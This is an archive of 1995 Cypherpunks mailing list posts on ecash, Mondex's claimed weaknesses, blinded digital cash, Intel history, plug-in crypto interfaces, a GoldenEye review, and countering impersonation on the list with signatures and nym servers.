Subject: Re: Ecash account
Message-ID: <199511180326.TAA18869@jobe.shell.portal.com>
MIME-Version: 1.0
Content-Type: text/plain


On Fri, 17 Nov 1995 don@cs.byu.edu wrote:

> So who here is going to use their ecash account to set up a money
> lau^H^H^Hexchange service?

Oh boy.  Not this argument again.  The one that says that if someone 
makes "change" that its money laundering.  *Sigh* I suppose it is, if 
that's the way you're going to look at it.  On that basis, every time I 
go to the corner grocery, I'm "laundering" my money.  So be it.

And I suppose if I put aside a small "nestegg", that then I've got
something to hide as well?? 

> Ob Cyphernoise: Would Dr Fred, Alice, and any other names LD has set up
> for himself lately please keep the noise limited to email? Please?

I too am tired of LD spoofing me.  But I am not going to actively "deny" 
every one of his posts.  It's just not worth it.

Hopefully the people on this list can tell the difference between what I 
stand for, and what certain people would like to paint me as standing for.

As I've said, and repeated, my only interests lie in E-cash, and in
removing code from the Internet which opens up security holes.  Software,
like Netscape Navigator and Java. 

The rest ... or anything else that someone tries to paint me as "standing 
for" is simply juvenile antics. 



Alice de 'nonymous ...

                                  ...just another one of those...


P.S.  This post is in the public domain.
                  C.  S.  U.  M.  O.  C.  L.  U.  N.  E.





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: anonymous-remailer@shell.portal.com
Date: Sun, 19 Nov 1995 03:18:08 +0800
To: cypherpunks@toad.com
Subject: No Subject
Message-ID: <199511180330.TAA19479@jobe.shell.portal.com>
MIME-Version: 1.0
Content-Type: text/plain


Subject:  Shoe-horning Mondex onto the Internet -- still won't fit



There many high barriers to the shoe-horning of Mondex onto the Internet:

+ Was not designed for the Internet, rather for physical portable cards
+ Requires expensive hardware: >$100/board for a PC in start-up quantities 
+ Accoring to inside sources, is vulnerable to MITM between payer and payee
+ According to inside sources, is grossly vulnerable to replay attacks 
(offline multi-spending to different parties)
+ The designers have zero experience and reputation in the cryptographic and
computer security communities
+ None of the Mondex designs have been published or peer reviewed.
+ The protocol cannot be published for security reasons, which means
-- Mondex has security holes
-- Customers who defraud Mondex-using banks have legal deniability in a 
court of law: they can simply request banks to produce the security 
protocols as evidence; if they refuse the case is thrown out of 
court (precedent: UK and US phantom-ATM withdrawal cases)






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: jimbell@pacifier.com (jim bell)
Date: Sat, 18 Nov 1995 11:56:28 +0800
To: cypherpunks@toad.com (Cypherpunks Mailing List)
Subject: Re: e$: Come aaaannnndddd Get it!
Message-ID: <m0tGdxc-00090gC@pacifier.com>
MIME-Version: 1.0
Content-Type: text/plain


>jim bell writes: [re: payee anonymity]
>> It seems to me that this should be possible, within limits, if the potential
>> payee could generate a "blinded" note to be delivered to the payer by
>> anonymous means.  The payer could get the note certified by the bank,
>> possibly given an extra "blind" if necessary  (is this possible? Desirable?
>> Why not?) and then the resulting still-blinded but certified note is posted
>> (in encrypted form, I supposed) to the 'net so that only the payee can
>> decrypt and unblind it.
>
>This sounds like a version of "Hey, I'll pay you $10, if you give me a ten
>dollar bill first." As I understand your protocol, Bob gives Alice an enote,
>then Alice gives Bob an enote. Alice isn't paying Bob in any meaningful sense,
>since Bob ends up with the same amount of e$ with which he started. Perhaps
>you could clarify what you meant.

It sounds like you understand even less about the details of digital cash
than I do.

First, read the August 1992 issue of Scientific American, the article by
David Chaum.  He explains, with a certain amount of detail, how blinded
digital cash operates.  To become validated and worth money, it first has to
be electronically "written," blinded, and then signed by the bank.  Then it
is unblinded, at which point it can be spent.  

What I was saying is that the notes would be written by the payee, then
blinded by the payee, given to the payer, and then signed by the payer's
bank.  At this point, they are worth money, and they are then returned to
the payee, possibly by encrypting them and publishing them in encrypted form
on a publicly-accessible portion of the Internet, so "anyone" could read
them.  Only the intended payee would be able to decrypt them, however, and
only the payee would be able to unblind the notes.





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: attila <attila@primenet.com>
Date: Sat, 18 Nov 1995 05:13:07 +0800
To: "Timothy C. May" <tcmay@got.net>
Subject: Re: Corrections about Bob Noyce and Intel
In-Reply-To: <acd204fa000210047be5@[205.199.118.202]>
Message-ID: <Pine.BSD.3.91.951117192114.9415R-100000@usr5.primenet.com>
MIME-Version: 1.0
Content-Type: text/plain


On Fri, 17 Nov 1995, Timothy C. May wrote:

> At 4:55 PM 11/17/95, attila wrote:
> 
> >   2.  most were pioneers: a specific example is Bob Norris who walked
> >       out of a Fairchild board meeting being being rejected for his
> >       eighth try at replacing Germanium because the first seven had
> >       failed. A couple of VCs, among them Arthur Rock and Bob Perring
> >       said: "...we believe you, let's try silicon..." and we have Intel.
> 
	a sign of getting old: blowing names. yes, it is Noyce.

> Bob Noyce was already making silicon devices at Fairchild. The "planar
> process" was developed by him in the late 50s. It is not the case that
> Fairchild was stuck making germanium, nor that Intel was the first to use
> silicon. I could go on about the actual history, but this is far from the
> themes of this list, and many books cover the history very well.
> 
> What Intel pioneered the development of was _silicon-gate MOS_, where the
> aluminum gates of traditional silicon devices is replaced with polysilicon
> gates. Intel did this by hiring the silicon-gate gurus from Fairchild
> (Vadasz, Grove, Faggin, etc.).
>
    you are probably correct, I did not follow the actual technology. I
    do know that from the financial point of view, there had been too many
    failures to justify another large project --yes, that could have been
    the silicon-gate MOS theory.  But there certainly was a parting of the
    ways over funding, to the probable good of the industry since
    Fairchild was already very stodgy. You do need a new, ambitious 
    venture to exploit a new technology --one with a single goal, and
    Intel certainly was that vehicle. 

    The closest I got to Fairchild Semiconductor was when I was consulting
    as a hatchet man to "save" another, newly acquired, Fairchild division
    which had a desparate need for 100K ECL parts which were not really 
    on the market in 1977.  The labs in the old building 2 were in pitiful 
    shape, and that is where 100K ECL had been ostracized --the new
    division's product was hot on the list of then current Fairchild
    president, Cronin, who suffered through my presenation of why I 
    needed $1M plus the 100K lab and fab upgraded --funding for both was
    the same day, not the usual 3-6 months.  Nice corporate jet at the
    time.... :)  and, yes, both projects were _very_ successful.
 
> >       But, who drives Intel today? --Grove, who is labelled as the
> >       founder.  Grove made the _business_ -the brains have been
> >       forgotten. Norris was the darling of the VCs for a couple years
> >       until they figured he couldn't spot a _financial_ success.
> 
> Grove remains a technologist--I studied semiconcuctor physics from his
> wonderful 1967 book, "The Physics and Technology of Seminconductor
> Devices"--and the group that leads Intel is highly technical. Gordon Moore
> remains connected, materials scientist Craig Barrett (who hired me into
> Intel in '74, ironically) is next-in-line to be President, Gerry Parker is
> a top technologist, and so on.
>
    Grove _was_ a technologist, but his current competitive tactics may 
    have been the tutor for Bill Gates  --or is the other way around? :)
    since Bill is the most effective and feared, even by government, of
    competition by terror tactics ever seen --beats even Cornelius
    Vanderbilt who tried to contain Edison so his gas businesses would not
    suffer --CB _financed_ Edison and then tried to block Edison --who
    then essentially gave NYC the downtown power station, building it in 
    defiance of CB.

    But, even if Edison was the inventor, he was not a visionary: he had
    Tesla, who already had an AC motor, in his employ in the 1880s; they
    parted as Edison would not budge off DC and Tesla sold his AC 
    Techology to George Westinghouse who had a great deal of money from
    his air brakes.  When Tesla received the Niagra Fall power generator
    contract, DC was history and the huge generators Tesla designed are
    still running at the base of the falls --90+ years! 

    The same analysis can be applied to to Bob Noyce v. Andrew Grove 
    --Andrew Grove may have been an engineer, but he also became a 
    visionary, as did Bill Gates.

    I have not seen, or had the pleasure of seeing, Gordon Moore for at 
    least 10 years. Yes, he is a technologist; AND, he is a gentleman. 

    I do not know Craig Barrett.  A Barrett presidency may change Intel's
    voracious competitiveness, or it may not.  

> As to Bob Noyce being the "darling of the VCs for a couple of years until
> they figured he couldn't spot a _financial_ success," I should just let
> that one pass. Noyce of course has been dead for several years. When he was
> alive, though, he "spotted" several financial successes.
>
    your history is generally better than mine, Tim, but I will differ on 
    that point. in the 70s and 80s I was consulting to 3-7 of the heavy 
    players at that time in the Sandhill group plus the old guard 
    downtown on high-tech ventures --I always figured I would get the call
    when their fear exceeded their greed.  :) (and so stated by one of
    their own). 

    you may be correct that Bob Noyce hit a couple of winners, but, 
    overall he did just the opposite. as two of the heavies stated over
    lunch one day, "...having Bob Noyce's recommendation became the kiss 
    of death in this town..."  

    Now, granted, the VCs have their own point of view of what a 
    financial success is --after all, they base their views on an
    investment strategy for 10 deals:  1 real winner (not necessarily a 
    NetScape or an Intel, but at least go public with a bang), 3 make
    decent profit, 3 investment returned (or most of it), and 3 dead, or
    close to dead, losses. 

    My objection to the VC financing strategy was that they also took
    personal notes from the startup team and selectively enforced them,
    usually on the pioneers and not the president and comptroller they
    installed as part of the deal; and they have been known to take 
    homes.... 
    
    Today's VC is a far cry from John D. Rockefeller who was vilified in
    his day for his business practices --John D. took 10%, not 51% or more
    plus personal notes. 

    BTW, John D. was the first "big" anti-trust case in the U.S. Ohio 
    drove him out of cleveland to NJ with their anti-trust actions in 
    1890 (or thereabouts) and the U.S. under Teddy "Rough Rider" Roosevelt
    broke him apart nationally in 1909 for his slash and burn tactics.
    Where is Teddy when we need him for Microsoft, not the awestruck 
    Bubba we have as commander and chief.

    I should remember more about John D. and anti-trust than I do, but it 
    is over 30 years since I wrote my senior thesis at Harvard on
    regulation of monopoly. --and age is setting in! :) Yes, I know you
    are retired --hopefully happily with a pension. consultants with blood
    on their hatchets make few friends, and the terms of getting old are
    more like time involutarily on your hands in So CA's empty economy.
    the hell you say, it's more like one big study and learn time! 
    Knowledge was and still is power!  as long as we have cryptography to 
    protect it.

	Dr. Daniel Flickinger
	 
> --Tim May
> 




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: ahupp@primenet.com (Adam Hupp)
Date: Sat, 18 Nov 1995 11:43:12 +0800
To: cypherpunks@toad.com
Subject: Re: NSA, ITAR, NCSA and plug-in hooks.
Message-ID: <199511180319.UAA07399@usr5.primenet.com>
MIME-Version: 1.0
Content-Type: text/plain


>From: Scott Brickner <sjb@universe.digex.net>
>Date: Thu, 16 Nov 1995 15:13:27 -0600
>Subject: Re: NSA, ITAR, NCSA and plug-in hooks. 

>The problem is that the non-encryption program must use the same
>interface as the encryption program.  Text compression is often cited
>as an example of a non-encryption program that can use the same hooks
>as a compression program, but there's a key difference:  the text
>compressor *doesn't* need a key.
>
>The encryption tool would have an interface like
>    Boolean (*)( DataSource, DataSink, void*);
>
>A compressor written to the same interface would never need to touch
>that third argument.  Therefore, the second argument is "specifically
>designed" to permit an encryption tool to be used.
>
>You'd need a program which not only *accepted* the additional parameter,
>but also *needed* the second parameter.  I confess I have some difficulty
>thinking of one.
>

PKZIP allows encryption (other's ?).  How about a hook to that?

_____________________________________________________________

"We work in the dark  We do what we can  We give what we have
Our doubt is our passion  And our passion is our task   
The rest is the madness of art."  
                   --Henry James
___________________________________________________________





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "David E. Smith" <dsmith@midwest.net>
Date: Sat, 18 Nov 1995 12:28:36 +0800
To: cypherpunks@toad.com
Subject: [NOISE] Review: GoldenEye
Message-ID: <199511180406.XAA18908@bb.hks.net>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

Just got back from the new Pierce-Brosnan-as-007 flick.
It had a few typical "hacker" stereotypes, and a couple
of interesting crypto relevant references.

* Boris, the stereotypical hacker, was hacking through American
banks.  A screen had the words "Department of Justice" and the
DoJ logo; underneath were the words "Clipper Chip" and a list
of banks.

* The archvillian's plan involved a massive money transfer and
an EMP pulse; he very briefly explained the effects of what
would happen if every computer in London were rendered non-
functional.  Possible crypto-anarchy bits.

* Boris should learn the value of strong passphrases.  His
password for the massive mainframe which will be used in the
archvillain's scheme is a five-letter dictionary word, which
didn't change (and it was used on two different computers),
and he revealed it indirectly (it was a word puzzle).

* A few on-computer-screen references to "encryption".

* Boris and the mastermind kept bantering about "breaking codes."

* Boris' computer in Russia - in his apartment - has a domain
ending in ".comp.math.edu"; when his screen lights up with
the words "INCOMING EMAIL" he goes into a live chat (complete
with graphics).

Above-average action/adventure flick.  The technical mistakes are
forgiveable in the interest of dramatic license.  Don't watch
it for the techno/crypto bits, though.  Watch it because lots
of things blow up :)

Dave----- David E. Smith, c/o Southeast Missouri State University
1210 Towers South, Cape Girardeau MO USA 63701-4745
+1(314)339-3814, "dsmith@midwest.net", PGP ID 0x92732139
http://www.midwest.net/scribers/dsmith/
- ---
[This message has been signed by an auto-signing service.  A valid signature
means only that it has been received at the address corresponding to the
signature and forwarded.]

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2
Comment: Gratis auto-signing service

iQBFAwUBMK1btCoZzwIn1bdtAQFmOgF/ZLYc3sT1L5sQS+wqmS5U6wsx9jL86job
Ie6DU65FIuSZF6vFDBDNZFxZxs0HuaR6
=5PGz
-----END PGP SIGNATURE-----




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Raph Levien <raph@c2.org>
Date: Sat, 18 Nov 1995 16:57:26 +0800
To: cypherpunks@toad.com
Subject: Design proposal: crypto-capable generic interface
Message-ID: <199511180842.AAA06560@infinity.c2.org>
MIME-Version: 1.0
Content-Type: text/plain


Hi to cypherpunks who write code,

   The recent discussion of "plug-in" crypto is reminding me of some
design work I did earlier this year. This post presents the motivation
and some of the details of that design, slightly updated.

   First, a few words about what I consider to be good interface that
can support plug-in crypto. It has to support both email and the Web;
I feel that everything else follows. It should support completely
transparent integration, by which I mean no extra clicking or commands
or anything like that. Finally, it should be generic in that it will
support a number of other plug-in applications besides
cryptography. Two specific applications which interest me are file
format conversions and external-body resolving.

   The design is based partly upon .mailcap, which is perhaps the best
example of a generic interface we have today. However, while .mailcap
is a nice interface for popping up windows to present semi-interesting
multimedia types, it certainly cannot support transparent
cryptography. I feel that its primary weakness is the inability to
support MIME to MIME rewriting. However, .mailcap has some good ideas
which are worth stealing.
   For the purposes of this proposal, I will assume that all objects
are MIME encapsulated. I think that's a reasonable assumption, as it
handily covers all cryptographic protocols that have any hope of
surviving.

   I will propose my design at a very high level. Please forgive me
for leaving out the juicy details.

   I propose that the new interface lives as a sort of daemon, rather
than a static collection of command line script pieces. A reasonable
way for applications to talk to the daemon would be Unix domain
sockets, or whatever the equivalent is on Mac and Windows
platforms. There should be a simple protocol for automatically
starting up a daemon if there isn't one already running.

   The first part of the interface is the negotiation. The daemon
tells the application what MIME types it can understand (this part is
very similar to the .mailcap file, but doesn't include the
corresponding command lines). In reply, the application tells the
daemon what MIME types it can understand (this is like the
Http-Accept: field in HTTP).

   Once the negotation has been established, the application can send
the daemon MIME objects that the app does not understand but the
daemon does (for example, an image/fractal). The daemon can return a
MIME object that the app does understand (for example, an image/ppm).

   Alternatively, the daemon may request an authentication. This is
useful when resolving external bodies that require authentication,
including non-anonymous FTP, and standard authenticated HTTP. In this
case, the daemon sends a message to the app requesting the
authentication. It specifies whether it needs both username and
password, or just password. In the latter case, it hands a username to
the application.
   The application can then query the user for the authentication
data. It hands this back to the daemon. In reply, the daemon indicates
success or failure. In case of success, it hands the object back to
the app.

   I'm quite pleased with this protocol as outlined. It's fairly
simple, which means it might actually get implemented. It's also easy
to see that it does exactly what you want for file format conversions,
external body resolving, and decryption of encrypted messages.

   Encryption is a bit more tricky, but in essence you just hang a
premail-alike off this kind of protocol. The hard part is specifying
the key, but you just call it a "parameter" and put in hooks for the
daemon to ask for whatever parameters it needs. This requires that
keys have some nonforgeable names, which is unfortunately not a
feature of PGP 2.6.2. S/MIME will do it just fine, if you buy into the
Certifcation Authority (<wink> at Nick Szabo).

   One final aside: I've been fairly frustrated with this mailing list
as a forum for talking about real design proposals and implementation
issues. Ignorant posts by the likes of Dr. Fred and Alice d'Clueless
tend to attract far more attention than real crypto work. I want a
forum for, and just for, cypherpunks who write code. If I had just a
smidgen more free time (as if), I'd be trying to start one
myself. Anyone else?

Raph




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: attila <attila@primenet.com>
Date: Sat, 18 Nov 1995 12:10:38 +0800
To: John Young <jya@pipeline.com>
Subject: rape in the gulch (was Noyce and Intel)
In-Reply-To: <199511172211.RAA12522@pipe3.nyc.pipeline.com>
Message-ID: <Pine.BSD.3.91.951118034854.20818C-100000@usr6.primenet.com>
MIME-Version: 1.0
Content-Type: text/plain



   that's why we call them vulture capitalists.  I know a few who would 
sell their own mother, several times, even after she died. I think Rock, 
Perring, the Davises, and a few more were gentlemen; but, as a group they 
certainly do not deserve much respect after each pact they make with the 
devil.  Once the big banks and insurance funds started supplying the 
underlying capitalization, the whores really moved in and made it what I 
refer to as evil money.

   you dont need to believe the New World Order is calling the shots to 
see where the banks are coming from.

On Fri, 17 Nov 1995, John Young wrote:

> Worth magazine of Dec/Jan has a lubricious article on "The 
> Super Investors of Silicon Valley":
> 
> 
> " 'Rise of the Silicon Patriots,' by Donald Katz. If their egos 
> and paychecks are oversized, so is their impact on the economy 
> and culture. It's not for nothing that California's venture 
> capitalists think they're at the center of the universe."
> 
> 
> It traces some of the mauling by rapacious VC tigers of unwary 
> techno-bambis and gleefully vaunts winner-take-all when the 
> chips are down (multiple puns there) -- commensurate with the 
> flatulent flattering flummoxing of this "financial 
> intelligence" oilslicker.
> 
> 
> For more FFF FinInt organ-grinding the monkeys, see 
> "Downloading Warren Buffet's Brain."
> 
> 
> 




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Daniel 'genius' Charpentier" <drcharpe@hamlet.uncg.edu>
Date: Sat, 18 Nov 1995 18:59:41 +0800
To: cypherpunks <cypherpunks@toad.com>
Subject: WRITTEN CODE
Message-ID: <Pine.SOL.3.91.951118052646.7857B-100000@hamlet>
MIME-Version: 1.0
Content-Type: text/plain




  In Raph Levien's

       Subject : Design proposal : crypto-capable generic interface

he mentioned his desire to see more cryptographic program code and
I didn't want to see this initiative die.  I am a new commer to
cryptography and I know I shouldn't be posting yet but that is
what I thought cypherpunk postings was supposed to be in the first
place ( program code, protocols, and algorithms ).  Please don't
flame me to badly for this message.  I am doing everything I am
supposed to before posting ( reading the FAQ's, the entire
cypherpunk archive, and APPLIED CRYPTOGRAPHY by Bruce Schneier )
but I could not let this slip by.  Let's talk more about the
cryptographic algorithms, program code, and chips than
politics.  


                     I hope this did not upset to many people





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Sandy Sandfort <sandfort@crl.com>
Date: Sun, 19 Nov 1995 00:25:08 +0800
To: Cypherpunks <cypherpunks@toad.com>
Subject: Give us your wired, your poor, your HTML hacker, yearning to web , freely (fwd)
Message-ID: <Pine.SUN.3.91.951118080033.10982A-100000@crl12.crl.com>
MIME-Version: 1.0
Content-Type: text/plain


~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
                          SANDY SANDFORT
 . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .

S'punks,

Anyone need a job in the Bay Area?  I think a Cypherpunk would be
ideal for this job.


 S a n d y

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
---------- Forwarded message ----------
Date: 17 Nov 95 17:29:42 
From: Steve Gibson <Steve_Gibson@bionomics.org>
To: Friends of Bionomics <Friends_of_Bionomics@notes.worldcom.com>
Subject: Give us your wired, your poor, your HTML hacker, yearning to web freely

Dear Friends,

We need help.  

We need a combination web-cultivator, researcher, editor, conference assistant 
and Notes/Mac wizard.  In sum, a typical enterpreneurial utility infielder.  

Finding people who comfortably straddle the worlds of public policy and high 
technology can be tricky.  We look to you, as someone familiar with The 
Bionomics Institute, for assistance in this key search.  (After all, this one 
hire represents a 33% increase in our staff.) 

If you know of such a person, please get the following information to them, or 
get them in touch with us.

Thanks,
Steve


* * * * * * * * * * * * * * * * * * * * * * * * *
JOB OPENING
* * * * * * * * * * * * * * * * * * * * * * * * *

WHO WE ARE
The Bionomics Insitute is non-profit educational foundation (aka Think Tank) 
dedicated to replacing the conventional mechanistic model of the economy with a 
living, ecosystem one, as described in  Michael Rothschild's book <Bionomics: 
Economy as Ecosystem>.

QUALIFICATIONS
Must be comfortable (1) all over the WWW, and inside the HTML of our web site, 
and (2) researching economics, technology, history, biology, public policy and 
??? using libraries, on-line data sources, phone calls and brainpower, and 3) 
familiar with free-market thinking.

JOB DESCRIPTION
(1) Nurture Institute web site.  (2) Provide primary research support for 
free-market think tank/high-tech columnist.  (3) Maintain research library.  
(4) Assist in general operations of Institute, including conferences, etc.  (5) 
etc. (6) see 5.

ORGANIZATIONAL CULTURE
Informal but intense work environment, self-starters only.  Teamwork and 
communication trite but very necessary.  Technical knowledge must be matched 
with broad interests and strong English skills.  Small staff, medium salary, 
large hours.

IF YOU MADE IT THIS FAR
Do your research on Bionomics (www.bionomics.org would be a good place to 
start), then email resume to Research@bionomics.org.

(November 17, 1995)

Steve Gibson, Executive Director, The Bionomics Institute, 415/454-1000, 
www.bionomics.org





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: tcmay@got.net (Timothy C. May)
Date: Sun, 19 Nov 1995 00:59:46 +0800
To: "Daniel 'genius' Charpentier" <cypherpunks@toad.com>
Subject: Re: WRITTEN CODE
Message-ID: <acd34c9c010210049064@[205.199.118.202]>
MIME-Version: 1.0
Content-Type: text/plain


At 10:51 AM 11/18/95, Daniel 'genius' Charpentier wrote:

>I didn't want to see this initiative die.  I am a new commer to
>cryptography and I know I shouldn't be posting yet but that is
>what I thought cypherpunk postings was supposed to be in the first
>place ( program code, protocols, and algorithms ).  Please don't
        ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^

The list is about several things, some of which overlap the topics
routinely discussed in sci.crypt and sci.crypt.research.

Algorithms, code, etc. _does_ get discussed a lot, as you'll surely see as
you peruse the archives. Volume-wise, it is a drop in the bucket. But this
is not surprising, as primarily mathematical questions and answers tend to
be brief. (You'll see this in the many one-line answwers to questions about
cryptographic algorithms....)

Also, technical questions tend to have precise answers, usually with
answers in the various crypto texts and proceedings of the Crypto and
EuroCrypt conferences. And technical questions which _don't_ have simple
answers in the texts tend of course to be _research_ questions, and the
dynamics mitigate against lively discussion until some progress is made.

The social, political, and economic aspects are seldom discussed adequately
elsewhere, and one thing the Cypherpunks group has really led in is the
discussion of digital money, anonymous systems, pseudonyms, reputation,
markets, and a host of other such topics. These topics can border on pure
politics if people are not careful, but are generally close to the topics
discussed at the first meeting over three years ago, before there was even
a mailing list.


>flame me to badly for this message.  I am doing everything I am
>supposed to before posting ( reading the FAQ's, the entire
>cypherpunk archive, and APPLIED CRYPTOGRAPHY by Bruce Schneier )
>but I could not let this slip by.  Let's talk more about the
>cryptographic algorithms, program code, and chips than
>politics.

So, go ahead and talk. I mean this seriously, not sarcastically.

No one will chastise you or anyone else for discussing technical
cryptography. There are obviously folks interested in this. Experts, even.
Published experts, even.

--Tim May

Views here are not the views of my Internet Service Provider or Government.
---------:---------:---------:---------:---------:---------:---------:----
Timothy C. May              | Crypto Anarchy: encryption, digital money,
tcmay@got.net  408-728-0152 | anonymous networks, digital pseudonyms, zero
Corralitos, CA              | knowledge, reputations, information markets,
Higher Power: 2^756839      | black markets, collapse of governments.
"National borders are just speed bumps on the information superhighway."






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Adam Shostack <adam@lighthouse.homeport.org>
Date: Sat, 18 Nov 1995 23:02:54 +0800
To: raph@c2.org (Raph Levien)
Subject: Re: Design proposal: crypto-capable generic interface
In-Reply-To: <199511180842.AAA06560@infinity.c2.org>
Message-ID: <199511181441.JAA02040@homeport.org>
MIME-Version: 1.0
Content-Type: text


Raph Levien wrote:

|    I propose that the new interface lives as a sort of daemon, rather
| than a static collection of command line script pieces. A reasonable
| way for applications to talk to the daemon would be Unix domain
| sockets, or whatever the equivalent is on Mac and Windows
| platforms. There should be a simple protocol for automatically
| starting up a daemon if there isn't one already running.

	A daemon per user, or per machine?  Either way, I think you
run into problems on a big multi-user machine.  (Either its an extra
process or two per person, or its a great target for attack &
subversion.

	Its an interesting proposal, but let me ask you this--Why is
it better than a libpgp (or pgp.dll) that offers a variety of services
to programs at multiple levels (ie, offers full one call RSA/IDEA
encryption and compression, as well as ascii armoring, or offers each
of those as a seperate function.




-- 
"It is seldom that liberty of any kind is lost all at once."
					               -Hume





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Adam Shostack <adam@lighthouse.homeport.org>
Date: Sat, 18 Nov 1995 23:05:22 +0800
To: anonymous-remailer@shell.portal.com
Subject: Re: CSE gets flak on TV
In-Reply-To: <199511180300.TAA16642@jobe.shell.portal.com>
Message-ID: <199511181446.JAA02056@homeport.org>
MIME-Version: 1.0
Content-Type: text


If you want us to believe you didn't write it, publish a key, and
consistently use it to sign messages.  Incidentally, this also lets us
reliably filter you. :)


| Alice here (the real one) ...
| 
| I think that this "writer" who felt that it was desirable to attach MY
| name to this drivel deserves a good flogging. 


Adam
(Or someone cleverly forging posts in my name.)

-- 
"It is seldom that liberty of any kind is lost all at once."
					               -Hume





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: sameer <sameer@c2.org>
Date: Sun, 19 Nov 1995 02:33:36 +0800
To: aba@atlas.ex.ac.uk
Subject: Re: protecting against impersonation (was: CANADIAN PRESS REPORTS)
In-Reply-To: <29172.9511181558@exe.dcs.exeter.ac.uk>
Message-ID: <199511181816.KAA18622@infinity.c2.org>
MIME-Version: 1.0
Content-Type: text/plain


> 
> This post wasn't signed off, but I presume you are "Alice d'nonymous",
> it would help lots if you could get yourself an account with a nym
> server, such as alpha@c2.org.  That would have the advantages that
> your email address would be recognizable, and that people could reply
> to you if they wanted to.

	it's alpha.c2.org, not alpha@c2.org, btw.

	The added benefit of this is that people could killfile you easily.


> 
> If having a working reply address bothers you, well at least sign your
> posts, if you're concerned about a persistant identity, the tools are
> available to do it.  Complaining about things which have simple
> technological solutions won't get you much sympathy.
> 
> Adam
> 


-- 
sameer						Voice:   510-601-9777
Community ConneXion				FAX:     510-601-9734
The Internet Privacy Provider			Dialin:  510-658-6376
http://www.c2.org/ (or login as "guest")		sameer@c2.org




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: s1113645@tesla.cc.uottawa.ca
Date: Sat, 18 Nov 1995 23:56:33 +0800
To: "Daniel 'genius' Charpentier" <drcharpe@hamlet.uncg.edu>
Subject: Re: WRITTEN CODE
In-Reply-To: <Pine.SOL.3.91.951118052646.7857B-100000@hamlet>
Message-ID: <Pine.3.89.9511181002.A4814-0100000@tesla.cc.uottawa.ca>
MIME-Version: 1.0
Content-Type: text/plain




On Sat, 18 Nov 1995, Daniel 'genius' Charpentier wrote:

> he mentioned his desire to see more cryptographic program code and
> I didn't want to see this initiative die.  I am a new commer to
> cryptography and I know I shouldn't be posting yet but that is

Don't be shy: POST! If you've got good coding ideas, then by all
means we want to hear you. If you've got lousy ideas but good intentions,
the fastest way on the net to get corrected is to post a mistake :-) .
Nobody will flame you for that, so don't be so touchy.

> what I thought cypherpunk postings was supposed to be in the first
> cryptographic algorithms, program code, and chips than
> politics.  

Some of us codewriters are far lazier than others on the list, 
politicical discussion seems to take less effort and is the lowest common
denominator (too bad, but then I'm guilty; snore...).

>                      I hope this did not upset to many people

Hardly. Don't worry about it, besides, killfiles exist. I agree  
wholeheartedly too, I'd love to see more crypto code and protocol discussion.
I must point out though, that the quality you get is related to the 
quality you give, if you post crypto code/protocol material (I'm too lazy 
for that, right now...), that's what the debate will shift to.
Kind of like "Build it and they will come." (Field of Dreams?).

Curious, where is uncg.edu? Your French name doesn't make me think you're 
in the States (as an .edu address might suggest, but then not necessarily 
either). (univ of Calgary?)

Bonne fin de semaine.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: dlv@bwalk.dm.com (Dr. Dimitri Vulis)
Date: Sun, 19 Nov 1995 00:54:01 +0800
To: cypherpunks@toad.com
Subject: Re: WRITTEN CODE
In-Reply-To: <Pine.3.89.9511181002.A4814-0100000@tesla.cc.uottawa.ca>
Message-ID: <DHRReD28w165w@bwalk.dm.com>
MIME-Version: 1.0
Content-Type: text/plain


s1113645@tesla.cc.uottawa.ca writes:
> On Sat, 18 Nov 1995, Daniel 'genius' Charpentier wrote:
>
> > he mentioned his desire to see more cryptographic program code and
> > I didn't want to see this initiative die.  I am a new commer to
> > cryptography and I know I shouldn't be posting yet but that is
>
> Don't be shy: POST! If you've got good coding ideas, then by all
> means we want to hear you. If you've got lousy ideas but good intentions,

Amen. If you have something crypto-relevant to post, please do. As the amount
of noise on this list rises, the meaningful discussion goes away. Please help
reverse this trend.

> the fastest way on the net to get corrected is to post a mistake :-) .
> Nobody will flame you for that, so don't be so touchy.

Or if some anal-retentive jerk flames you, ignore him. Even if you make a naive
mistake in your post, and someone corrects it, both you and probably other
readers of this list will learn from it.

> Bonne fin de semaine.

Curious how in qc they say 'fin the semaine' while in France proper everybody
says 'weekend'.

---

Dr. Dimitri Vulis
Brighton Beach Boardwalk BBS, Forest Hills, N.Y.: +1-718-261-2013, 14.4Kbps




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Raph Levien <raph@c2.org>
Date: Sun, 19 Nov 1995 03:14:13 +0800
To: cypherpunks@toad.com
Subject: Re: Design proposal: crypto-capable generic interface
In-Reply-To: <199511181441.JAA02040@homeport.org>
Message-ID: <199511181856.KAA24071@infinity.c2.org>
MIME-Version: 1.0
Content-Type: text/plain


Adam Shostack wrote:
> A daemon per user, or per machine? Either way, I think you
> run into problems on a big multi-user machine. (Either its an extra
> process or two per person, or its a great target for attack &
> subversion.

One per user. I'm thinking that, most of the time, the daemon process
would only last as long as the application.

It is certainly true that if there were to be one daemon per machine,
the security requirements would be a lot greater, as it would no
longer be possible to rely on the operating system to get the file
permissions right, etc. On the other hand, the daemon process better
be done right, or your're in trouble anyway.

